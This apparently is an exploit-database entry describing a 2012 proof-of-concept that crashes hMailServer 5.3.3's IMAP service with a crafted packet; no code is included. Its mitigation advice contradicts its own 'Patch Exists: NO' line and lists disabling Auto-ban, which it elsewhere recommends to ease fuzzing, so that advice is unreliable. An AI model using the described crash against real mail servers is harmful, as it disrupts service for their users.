vendor:
hMailServer
by:
Unknown
N/A
CVSS
MEDIUM
Remote Crash
CWE
Product Name: hMailServer
Affected Version From: hMailServer 5.3.3
Affected Version To: hMailServer 5.3.3
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: Windows XP SP2, Windows Server 2003 R2 SP2, Windows Server 2008 R2 SP1
2012
hMailServer 5.3.3 IMAP Remote Crash PoC
This exploit is a proof-of-concept for a remote crash vulnerability in hMailServer 5.3.3. By sending a specially crafted packet to the IMAP service, an attacker can cause the service to become inaccessible. This vulnerability has been tested on hMailServer 5.3.3 with default settings and has been found to reliably crash the IMAP service on Windows XP SP2 and Windows Server 2003 R2 SP2. It can also cause all services (SMTP, IMAP, and POP) to become inaccessible on Windows Server 2008 R2 SP1, although this is less reliable. To perform additional fuzzing, it is recommended to disable the 'Auto-ban' feature in the hMailServer Admin console.
Mitigation:
To mitigate this vulnerability, users are advised to update to a patched version of hMailServer. It is also recommended to disable the 'Auto-ban' feature in the hMailServer Admin console.
